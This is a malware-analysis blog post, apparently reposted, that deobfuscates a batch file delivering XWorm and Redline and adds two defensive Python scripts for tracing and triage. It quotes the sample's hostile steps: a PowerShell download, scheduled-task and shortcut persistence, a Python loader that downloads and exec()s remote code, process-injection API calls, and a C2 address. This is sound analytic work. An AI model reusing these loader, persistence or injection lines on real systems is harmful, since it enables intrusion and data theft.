From a Highly Obfuscated Batch File to XWorm and Redline

admin, 2024-09-28 11:16:32


If you follow my diaries, you probably already know that one of my favourite malware topics is obfuscation. I am regularly impressed by the crazy techniques attackers use to make reverse engineers' lives harder. Last week I found a file named "crypted.bat" (SHA256: 453c017e02e6ce747d605081ad78bf210b3d0004a056d1f65dd1f21c9bf13a9a) that, according to VT [1], no antivirus engine detects. It deserved a closer look!

When you open the file in a text editor, this is what you see:

[Image: crypted.bat as displayed in a text editor]

The first widely used trick is the byte order mark (BOM). Here a UTF-16 (LE) BOM, the bytes FF FE, is placed at the start of the file. Note in the dump below that what follows the BOM is ordinary single-byte ASCII ("%CWk..."), not UTF-16 text: the BOM is only there to mislead tools and parsers that honour it, while cmd.exe reads the batch file byte by byte and simply sees two stray characters in front of the first command:

remnux@remnux:/MalwareZoo/20240820$ xxd crypted.bat | head -3
00000000: fffe 2543 576b 4941 7a6f 7825 3e25 7855  ..%CWkIAzox%>%xU
00000010: 7147 4f63 5425 257a 6341 796d 6d70 6325  qGOcT%%zcAymmpc%
00000020: 6e25 6763 5a53 704a 5065 2525 5243 7361  n%gcZSpJPe%%RCsa

If you strip the BOM and convert the file to plain ASCII, you get this:

%CWkIAzox%>%xUqGOcT%%zcAymmpc%n%gcZSpJPe%%RCsaTkgh%u%NrajlITIN%%FlosuXBh%l%UHWpNytD%%eVMEqNU%2%cfsrQUQzB%%PJakTgn%>%RefSuAz%%SkEtfgeM%&%eSIxMAoMy%% UTYiweX%1%wIwqYvcY% %ZPVOxQb%&%tySQLji%%YpbVsTD%&%LowuPzVsi% %dlyCzql%e%WdsbYAngD%%JAVuRTqx%x%qRAdGofXf%%ZlNPHhZ%i%BIHqMIv%%qAEKZwGsL%t%HCJPkwM%%HrmxKzzju%>%tgEGchZJ%%RPgxTsDqd%n%fOS LMWO %%AfRBXJVMr%u%wwuwslz%%ICSPyFU%l%mpdRSphJ% %ZynhxMK%2%DZjctPXH%%htGVgFpRM%>%SnuoRzrG%%bZgjFPGkJ%&%ZhtxeHp%%AkxdtiEx%1%fusLDeh% %QCHPHPX%|%kohylBV%%yJLIMIwFw%|%DeRJrLcp% %EvtJHRMln%c% xaarmMe %%akERTuAI%l%QojqolGI%%TunxPoBA%s%rjpMfvI%%oapTJQevr%@%WHKNkqk%%oqzVsZQ%e%YmNqtkd%%vdiHhTxI%c%xMvUDbmC%%WCXXQkQk%h%nueJqFl%%fMndPeG%o%WaNiIDzh%%uJeRwam%o%JdBMKkkK%%cRDqoXWq%f%YfipIdy %% EOiCmnjqu%f%jtWAxPYHA%%KzhGwGvJY%s%QMjCtXlpm%%KLXvhlX%^%zbASMkOKb%%MSoRIhosJ%e%oiRdjsAM%%IYWQOGT%t%JuxdyvMM%%nHqJvNFE%/%wJWtubVi%%jRBLVAoKa%^%zotsNYeS%%PKAAtOj%a%lHbOqSQ米% % gTRLvMIMh%a%TmYGqwITr%%tFWNDgGm%^%HAuoqhl%%AahyDuxE%n%brEAKhct%%sPaerVhD%S%PCCfCoV%%xyJnQmpg%=%xyZBFKb%%kgvpqle%0%igJPWFJh%%kHhywwZhj%3%OgmwBJPPO%%xWNiFhcNY%*%ospxJKsVH%%HWwoAYL%0% hqdGiiwS%%NosePdt%x%sTHZaRBMB%%SlmnYHf%3%EOZLOFflT%%VXgbmxUG%*%MPiWIOc%%kHUfmXe%0%MgkaPLhRY%%wZoyEHqhH%5%rQetBwquH%%eMdBPIjJ%*%oGzpdzdJc%%MPOdsiZQ%0%ruVOBkYqU%%KjFXrbbXb%3%GrywQPHa%%ApGTvfdw%5%hMcgXYFI%%nDAyneTR%*%QkVbhgwb%%ZlaxGFxhP%0%hVSWhhsi%%NFxCEiojT%x%avtVZdgT%%zOJsMdsiV%9%mIYjXPjXp%%XBPOHkzQR%7%TVTavXb%%zhDxhLixO%g%WqOitSUcP%%waQfbbZX%o%bYhMmYRJ%%JaLqJhJGK%^%wQcImER%%NjFttczP%t%zNQwEPG%%jckticUQ%^%SJHNHIEd%%QpgXMaZU%O%LYuYeAj% %TIMyhIah%;%kGMHyct% %FQiUhRT%,%wflaxcBC%%xGVWyGydK%,%OzsppQsYA%%jlFOQAm%;%fiDRSuVM% %anS%  :519609  %DgVWcoR%s%ZoIFCLprt%%NntCxCm%e%NgFZpwn%%pyLYsOmAO%^%wdAjOvn%%FFANelC%t%vVpMctJn% %ALLnvmHl%/%mFxhErB%%zqQlKRs%a%myJtTSMTo% 
%PXuVWTw%a%fFQUkrEpq%%cYZxExF%^%xyNKacYxS%%OWQkNHdZN%N%GbQyEVZnc%%JxWlmKWiu%^%gpPMNUTz%%cnJkBEKME%S%nyQCCeW%%stOmRCyRR%=%lljWlaa%%MUJYsuW%2%dIgZDUB%%zKFhHQaX%*%qbSVGOmT%%wpkFVpUhQ%2%VeqoxYWD%%SlQwVpsX%*%mBJzSHuCR%%bxXgukkg%2%zSxetVaPj%%kGQLxTcxY%*%hDmfydQ%%OoXhDbZj%2%ZuhkxkEp%%xITWbJnYV%*%FXnJHNc%%ixLinKshS%0%DnoYFgL%%fSqOFgB%5%Xapkdbgb%%LxvKpZFaN%*%ePDNvAP%%AFDBLDAG%0%oYYBmwfe%%Qdiujzov%2%lWWUzOnsT%%SlVybcJx%3%xZiUqrR%%mlzpecCpj%*%xCQyduGrX%%oAbeUiyIE%(%QeZtONu%%ZcgvICAx%0%nhOmDybFj%%jjUoKBsu%6%fkjNdnHSc%%UGcGIqN%2%owehgYFDL%%FUwxiPOW%0%ikcPJSh%%pKQMamsY%^%PCQNlJF%%MbI ydjP %^%NmCLQGrsA%%uLrORben%0%wOOPMHXa%%ebFjSHOd%x%DdLTfYUW%%eFUkTQXc%8%PlNXoGxZ%%iZoIjTGWG%b%hPytbQcp%%wOoGCuJ%)%qMzNOpWLK%%EYUngJPBb%g%xtyhGUl%%RUGmrEQws%^%RRahjnG%%coXzOZPxy%O%znjAGFDUI%%TNHDTjQ%t%buwgVewv%%EhyQGHFA%^%MRCzzkdFZ%%PXScpQWPR%O%mDzExmBGg%%aEXetltkX%;%XRCvjYb% % NEAOkHpfx%,%Scqfgqhl%%nexdrDtk%;%GqOiFqUN%%rQyHZCT%;%lXGsxpKk%%PtFrFcYDl%,%GNEWsWFT% %AnS%  :512015

Still painful! The second obfuscation technique is the use of empty environment variables (%xxx%). When cmd.exe interprets a batch file, any reference to an undefined variable expands to nothing, so the junk names simply disappear at run time and only the characters between them are left. Let's get rid of them with a simple regex (the junk names are all at least five characters long, while the real variables used by the script, such as %anS%, are shorter):

remnux@remnux:/MalwareZoo/20240820$ sed -E "s/%\w{5,}%//g" crypted-ascii.bat | head -10
>nul 2>&1 && exit >nul 2>&1 || cls
@echo off
s^et /^a a^nS=03*0x3*05*035*0x97
go^t^O ; ,,; %anS%
  :519609
se^t /a a^N^S=2*2*2*2*05*023*(0620^^0x8b)
g^Ot^O ; ,;;, %AnS%

We start to recognise code, but it is still hard to read! The remaining tricks are caret escapes (^ escapes the next character, so "s^et" is "set" and "^^" is a literal "^") and computed control flow: each "set /a" evaluates an arithmetic expression (leading 0 = octal, 0x = hex, ^ = XOR) and the result is the name of the label the following "goto" jumps to. For example:

C:\Users\REM\Desktop>s^et /^a a^nS=03*0x3*05*035*0x97
197055

The script therefore computes its labels on the fly and jumps back and forth through the file to carry out its malicious activity. With echo enabled, the linear execution trace looks like this:

set /a anS=03*0x3*05*035*0x97
gotO ; ,,; 197055
set /a ans=0x3*(0545^036)*(0750^041)
goto 519609
set /a aNS=2*2*2*2*05*023*(0620^0x8b)
gOtO ; ,;;, 430160
for /L %n in (87 87 87) do (set "i=a"  )
(set "i=a"  )
set /a ans=05*07*~-14630
goto 512015
set /a aNs=0x11*045*(0343^0x1be)
goTo ; ; ; 219521
for /L %x in (792 792 792) do (set "j=b"  )
(set "j=b"  )
set /a ans=2*05*0x5*(0x5621^0x1ce2)
goto 956950
set /a ans=2*0xb*027*((0x170^0x18c8)>>3)
gOto , ; 416438
for /L %l in (579 579 579) do (set "k=c"  )
(set "k=c"  )
set /a ans=0x200*05*~-282
goto 719360
set /a anS=2*2*05*(0xdf47^0x7c3c)
goto ; , 837020
for /L %l in (783 783 783) do (set "l=d"  )
(set "l=d"  )
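The clean-up steps above (BOM, empty variables, caret escapes) and the "set /a" arithmetic can be automated instead of being done by hand with sed and an interactive cmd prompt. The following script is an added example written for this page, not a tool from the original diary: it strips the BOM, expands %variables% the way a batch file does (undefined ones vanish), removes caret escapes, evaluates "set /a" expressions without eval() (leading-zero octal, hex, ^ as XOR, ~, signed 32-bit wrap) and follows each goto to the computed label, producing the same kind of linear trace as shown above. The embedded batch file is constructed for the example: it reuses the arithmetic expressions visible in the trace, but its layout and junk variable names are invented.

```python
import ast
import operator
import re

# Constructed sample, not the real crypted.bat: the same tricks in miniature. A UTF-16 BOM glued in
# front of plain ASCII (what the xxd output shows), junk %variables% between characters, ^-escaped
# keywords, and set /a arithmetic that yields the goto targets. Expressions are the ones in the trace.
SAMPLE_TEXT = (
    '%CWkIAzox%>%xUqGOcT%nul 2>&1 && exit >nul 2>&1 || cls\n'
    '@echo off\n'
    's^et /^a a^nS=03*0x3*05%zcAymmpc%*035*0x97\n'
    'go^t^O ; ,,; %anS%\n'
    '  :519609  \n'
    'se^t /a a^N^S=2*2*2*2*05*023*(0620^^0x8b)\n'
    'g^Ot^O ; ,;;, %AnS%\n'
    ':197055\n'
    'set /a ans=0x3*(0545^^036)*(0750^^041)\n'
    'goto 519609\n'
    ':430160\n'
    'for /L %%n in (87 87 87) do (set "i=a"  )\n'
    'set /a ans=05*07*~-14630\n'
    'goto %ans%\n'
    ':512015\n'
    'goto :eof\n'
)
SAMPLE_BYTES = b'\xff\xfe' + SAMPLE_TEXT.encode('ascii')

SET_A = re.compile(r'^set\s+/a\s+(\w+)\s*=\s*(.*?)\s*$', re.I)
GOTO = re.compile(r'^goto[\s;,=]+(\S+)', re.I)
_BIN = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul, ast.Mod: operator.mod,
        ast.BitXor: operator.xor, ast.BitAnd: operator.and_, ast.BitOr: operator.or_, ast.LShift: operator.lshift,
        ast.RShift: operator.rshift, ast.Div: lambda a, b: int(a / b)}   # cmd's / truncates toward zero
_UN = {ast.USub: operator.neg, ast.UAdd: operator.pos, ast.Invert: operator.invert}

def decode_with_bom(raw):
    """Trick 1, the BOM. Real UTF-16 text has a NUL in every second byte; crypted.bat has none, so the
    BOM only confuses tools that honour it. cmd.exe reads the file byte-wise and sees two stray
    characters in front of the first command, which the '>nul 2>&1 ... || cls' line absorbs."""
    if raw[:2] in (b'\xff\xfe', b'\xfe\xff'):
        body = raw[2:]
        if b'\x00' in body[:64]:
            return body.decode('utf-16-le' if raw[0] == 0xFF else 'utf-16-be')
        return body.decode('latin-1')
    return raw.decode('latin-1')

def expand_vars(line, env):
    """Trick 2: %name% becomes the variable's value, or nothing at all if it is undefined."""
    return re.sub(r'%(\w+)%', lambda m: str(env.get(m.group(1).lower(), '')), line)

def strip_carets(line):
    """Trick 3: ^ escapes the next character, so s^et -> set and ^^ -> ^ (XOR inside set /a)."""
    return re.sub(r'\^(.)', r'\1', line)

def eval_set_a(expr, env):
    """Trick 4: set /a arithmetic (leading 0 = octal, 0x = hex, ^ = XOR, ~ = NOT, signed 32-bit),
    evaluated by walking the AST so attacker-controlled text never reaches eval()."""
    py = re.sub(r'(?<![\w.])0([0-7]+)\b', r'0o\1', expr)     # 035 -> 0o35, Python 3 rejects bare 035

    def walk(n):
        if isinstance(n, ast.Constant) and isinstance(n.value, int):
            return n.value
        if isinstance(n, ast.Name):                             # bare variable operand, 0 if undefined
            return env.get(n.id.lower(), 0)
        if isinstance(n, ast.BinOp) and type(n.op) in _BIN:
            return _BIN[type(n.op)](walk(n.left), walk(n.right))
        if isinstance(n, ast.UnaryOp) and type(n.op) in _UN:
            return _UN[type(n.op)](walk(n.operand))
        raise ValueError('unsupported set /a syntax: %s' % expr)

    return (walk(ast.parse(py, mode='eval').body) + 2**31) % 2**32 - 2**31

def find_label(lines, name, pc):
    """goto scans forward from the current line for ':name' and wraps around to the top of the file."""
    for i in list(range(pc, len(lines))) + list(range(pc)):
        s = lines[i].strip()
        if s.startswith(':') and re.split(r'[\s;,=:]+', s[1:], maxsplit=1)[0].lower() == name:
            return i
    return None

def trace_batch(raw, max_steps=500):
    """Follow the control flow the way cmd.exe would; returns (linear trace, final variables)."""
    lines = decode_with_bom(raw).splitlines()
    env, trace, pc, steps = {}, [], 0, 0
    while pc < len(lines) and steps < max_steps:
        steps += 1
        s = lines[pc].strip()
        pc += 1
        if not s or s.startswith(':'):                          # blank line or label definition
            continue
        s = strip_carets(expand_vars(s, env)).lstrip('@')       # cmd expands %vars% before handling ^
        m = SET_A.match(s)
        if m:
            env[m.group(1).lower()] = eval_set_a(m.group(2), env)
            trace.append(('set', m.group(1), env[m.group(1).lower()]))
            continue
        m = GOTO.match(s)
        if m:
            target = m.group(1).lstrip(':').lower()
            trace.append(('goto', target))
            if target == 'eof':
                break
            pc = find_label(lines, target, pc)
            if pc is None:
                raise ValueError('label :%s not found, cmd would abort here' % target)
            continue
        trace.append(('cmd', s))
    return trace, env
```

Running `trace_batch(SAMPLE_BYTES)` yields the set/goto sequence 197055, 519609, 430160, 512015 in execution order, independent of where the labels sit in the file. On the real sample the same loop reproduces the trace above without executing anything, and the per-line `('cmd', ...)` entries are where the non-arithmetic payload commands surface.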

The following commands keep rebuilding the real payload by defining more environment variables a few characters at a time, which makes static analysis painful. Let's speed things up a bit.

Many batch files close their console window as soon as they finish. To prevent that, here is a quick tip: first re-enable command echo by removing the "@echo off" line, then run the script with "cmd /k". The /k switch keeps the console open when the script ends, so everything it executed stays on screen!

Once the script runs, keep a close eye on system activity. Here is the resulting process list:

[Image: process list captured while crypted.bat runs]

Let's review some of the script's capabilities:

First, a standalone Python environment is downloaded and deployed:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/LoneNone1807/RedAV/raw/main/Python310.zip', [System.IO.Path]::GetTempPath() + 'Python310.zip') "

Persistence is achieved through a scheduled task. First a shortcut (.lnk) is created that points to pythonw.exe, opens minimized (WindowStyle = 7), borrows an icon from Microsoft Edge, and carries the first-stage Python loader on its command line:

$s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZ ... (trimmed) ... uZGVjb2RlKCd1dGYtOCcpKSk='))";
$obj = New-Object -ComObject WScript.Shell;
$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");
$link.WindowStyle = 7;
$link.TargetPath = "$env:LOCALAPPDATA\Programs\Python\Python310\pythonw.exe";
$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";
$link.Arguments = "-c `"$payload`"";
$link.Save() "

Then the task itself, which runs the shortcut at every logon with the highest available privileges:

schtasks /create /tn "Windows Security" /sc ONLOGON /tr "C:\Users\admin\AppData\Local\WindowsSecurity.lnk" /rl HIGHEST /f

The embedded Python code is therefore executed again at every logon. Let's have a look at it (base64-decoded):

import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('hxxps://raw[.]githubusercontent[.]com/LoneNone1807/martin/main/xclient-enc').read().decode('utf-8')))

remnux@remnux:/mnt/hgfs/MalwareZoo/20240820$ cat foo
import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('hxxps://raw[.]githubusercontent[.]com/LoneNone1807/martin/main/redline-enc').read().decode('utf-8')))
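A shortcut or scheduled-task action like this can be triaged without running anything, by peeling the base64 layers statically. The script below is an added example written for this page, not code from the diary or from the malware: it unwraps nested exec(base64.b64decode('...')) literals, collects the URLs found in each layer and reports why the action looks like this loader. The shortcut target path and the inner stage are constructed for the example (the stage is modelled on the decoded script shown above, with the URL defanged as on the page).

```python
import base64
import re

# Constructed sample (not taken from the malware): the Arguments string of a shortcut built the way the
# diary describes, i.e. pythonw.exe -c "import base64;exec(base64.b64decode('...'))". The inner script
# is modelled on the decoded stage shown above; the URL is defanged exactly as on the page.
STAGE2 = ("import urllib.request;import base64;"
          "exec(base64.b64decode(urllib.request.urlopen("
          "'hxxps://raw[.]githubusercontent[.]com/LoneNone1807/martin/main/xclient-enc'"
          ").read().decode('utf-8')))")
STAGE1 = "import base64;exec(base64.b64decode('%s'))" % base64.b64encode(STAGE2.encode()).decode()
SAMPLE_TARGET = r"C:\Users\victim\AppData\Local\Programs\Python\Python310\pythonw.exe"   # hypothetical path
SAMPLE_ARGS = '-c "%s"' % STAGE1

B64_LITERAL = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL = re.compile(r"(?:https?|hxxps?)://[^\s'\"()]+")

def peel(text, max_depth=5):
    """Statically unwrap nested exec(base64.b64decode('<literal>')) layers; nothing is executed."""
    layers = [text]
    for _ in range(max_depth):
        m = B64_LITERAL.search(layers[-1])
        if not m:
            break
        try:
            layers.append(base64.b64decode(m.group(1), validate=True).decode('utf-8', 'replace'))
        except ValueError:            # not valid base64: stop peeling and keep what we have
            break
    return layers

def triage(target, arguments):
    """Reasons a shortcut/task action looks like this loader; an empty list means nothing was found."""
    reasons = []
    layers = peel(arguments)
    if target.lower().endswith(("pythonw.exe", "python.exe")) and re.search(r"(^|\s)-c\s", arguments):
        reasons.append("python interpreter started with inline -c code")
    if len(layers) > 1:
        reasons.append("inline code exec()s %d base64-decoded layer(s)" % (len(layers) - 1))
    for url in sorted({u for layer in layers for u in URL.findall(layer)}):
        reasons.append("fetches further code from %s" % url)
    if "urlopen" in layers[-1] and "exec(" in layers[-1]:
        reasons.append("final layer downloads and exec()s remote content")
    return reasons
```

Feed `triage()` the TargetPath and Arguments of every .lnk referenced by a scheduled task (or the /tr value itself when it is not a shortcut); a pythonw.exe target with an inline base64 exec() chain that ends in urlopen is the combination to alert on.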

Just by reading the URLs you can guess what is delivered next! Both scripts are identical except for the URL, so let's dig deeper into the first one. The base64-decoded payload is another heavily obfuscated Python script:

remnux@remnux:/MalwareZoo/20240820$ base64dump.py -s 1 -d xclient-enc | head -20
__7757181224032 = 0
__7757181224032 += 1
try:
    raise MemoryError(__7757181224032)
except MemoryError as __6869620366740:
    if __6869620366740.args[0] == 1:
        globals()['R_E_D__A_V_______'] = bool if bool(bool(bool(bool))) < bool(type(int(141) > int(136) < int(917) > int(914))) and bool(str(str(12) > int(1914) < int(135) > int(1213))) > 2 else bool
    if __6869620366740.args[0] == 3:
        __2756301777751 = 183678491109303
    if __6869620366740.args[0] == 4:
        __3230546755142 = 108555631585962
    if __6869620366740.args[0] == 5:
        __7482691456924 = 132970063103483
__2177051061499 = 0
__2177051061499 += 1
try:
    raise MemoryError(__2177051061499)
except MemoryError as __2341209797439:
    if __2341209797439.args[0] == 1:
        globals()['R_E_D__A_V______'] = str if bool(bool(bool(str))) < bool(type(int(1119) > int(712) < int(39) > int(34))) and bool(str(str(174) > int(1712) < int(173) > int(513))) > 2 else str
The obfuscation is built on try/except exception handling: a counter is raised inside a MemoryError and the handler tests args[0] to decide which assignment to perform, burying trivial assignments under noise. Not all of the code is obfuscated, though, so the script's purpose is easy to work out:
remnux@remnux:/mnt/hgfs/MalwareZoo/20240820$ grep 'kernel32.' foo
       kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, SIZE_T, DWORD, DWORD]
       kernel32.VirtualAllocEx.restype = LPVOID
       kernel32.WriteProcessMemory.argtypes = [HANDLE, LPVOID, LPCVOID, SIZE_T, POINTER(SIZE_T)]
       kernel32.WriteProcessMemory.restype = BOOL
       kernel32.CreateRemoteThread.argtypes = [HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD]
       kernel32.CreateRemoteThread.restype = HANDLE
       kernel32.VirtualProtectEx.argtypes = [HANDLE, LPVOID, SIZE_T, DWORD, LPDWORD]
       kernel32.VirtualProtectEx.restype = BOOL
       kernel32.CreateProcessA.argtypes = [LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, POINTER(STARTUPINFO), POINTER(PROCESS_INFORMATION)]
       kernel32.CreateProcessA.restype = BOOL
       kernel32.QueueUserAPC.argtypes = [PAPCFUNC, HANDLE, POINTER(ULONG)]
       kernel32.QueueUserAPC.restype = BOOL
       kernel32.ResumeThread.argtypes = [HANDLE]
       kernel32.ResumeThread.restype = BOOL

The Python script declares, through ctypes, every API call needed to perform classic code injection into another process! (Strictly speaking, the set shown, CreateProcessA in suspended mode, VirtualAllocEx/WriteProcessMemory/VirtualProtectEx, QueueUserAPC and ResumeThread, with no SetThreadContext and no unmapping of the original image, is the "early bird" APC-injection variant rather than textbook process hollowing; the effect is the same: a process with a legitimate name ends up executing the payload.)

Indeed, we can see that a process with a randomly chosen name is created in suspended mode to be hollowed (code beautified):

is_created = kernel32.CreateProcessA(
    None,
    b'C:\\Windows\\System32\\' + random.choice([
        b'svchost.exe', b'notepad.exe', b'lsass.exe', b'winlogon.exe', b'sihost.exe', b'taskhostw.exe',
        b'fontdrvhost.exe', b'wbem\\WmiPrvSE.exe', b'RuntimeBroker.exe', b'conhost.exe', b'audiodg.exe',
        b'cmd.exe', b'smartscreen.exe', b'SecurityHealthSystray.exe', b'calc.exe', b'ping.exe', b'mspaint.exe',
        b'mstsc.exe', b'dwm.exe', b'spoolsv.exe', b'wuauclt.exe', b'SearchIndexer.exe', b'MusNotifyIcon.exe',
        b'WindowsPowerShell\\v1.0\\powershell.exe']),
    None, None,
    # obfuscated bInheritHandles argument
    (lambda: (lambda _113: _113 - (lambda: ______R_E_D__A_V_______((lambda: R_E_D__A_V(b'R_E_D__A_V__wx'))()))())((lambda: R_E_D__A_V(b'R_E_D__A_V__'))()) == (lambda: R_E_D__A_V(b'R_E_D__A_V__x01'))())(),
    CREATE_SUSPENDED | CREATE_NO_WINDOW,
    None, None, byref(startup_info), byref(process_info))
Note that the target is picked at random from a list of legitimate-looking system process names, so the injected process name varies from one infection to the next!
Once the suspended process exists, the malicious code is written into it. To find the payload, let's look at the WriteProcessMemory call:
is_written = kernel32.WriteProcessMemory(process_info.hProcess, remote_memory_address, buf, len(buf), byref(bytes_written))

The "buf" variable above is filled with content downloaded from yet another file in the same GitHub repository:

buf = base64.b64decode(urllib.request.urlopen("hxxps://raw[.]githubusercontent[.]com/LoneNone1807/martin/main/XClient.b64").read())

The same technique is used by the second script to create the process that runs the Redline stealer.

The extracted XWorm configuration is:

{
  "C2": "15[.]235[.]176[.]64:7000",
  "Keys": {
    "AES": "<123456789>"
  },
  "Options": {
    "Splitter": "<Xwormmm>",
    "Sleep time": "3",
    "USB drop name": "XWorm V5.6",
    "Mutex": "5stMCVxSzALOfTCK"
  }
}

References:

[1] https://www.virustotal.com/gui/file/453c017e02e6ce747d605081ad78bf210b3d0004a056d1f65dd1f21c9bf13a9a

[2] https://en.wikipedia.org/wiki/Byte_order_mark

Originally published by the WeChat public account (Ots安全): From a Highly Obfuscated Batch File to XWorm and Redline

Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For questions, contact us by e-mail (preferably from a corporate or other valid mailbox so the message is not filtered; see the home page for contact details).
Posted by admin on 2024-09-28 11:16:32. Please keep this link when reposting (CN-SEC: thanks to the original author): https://cn-sec.com/archives/3101701.html
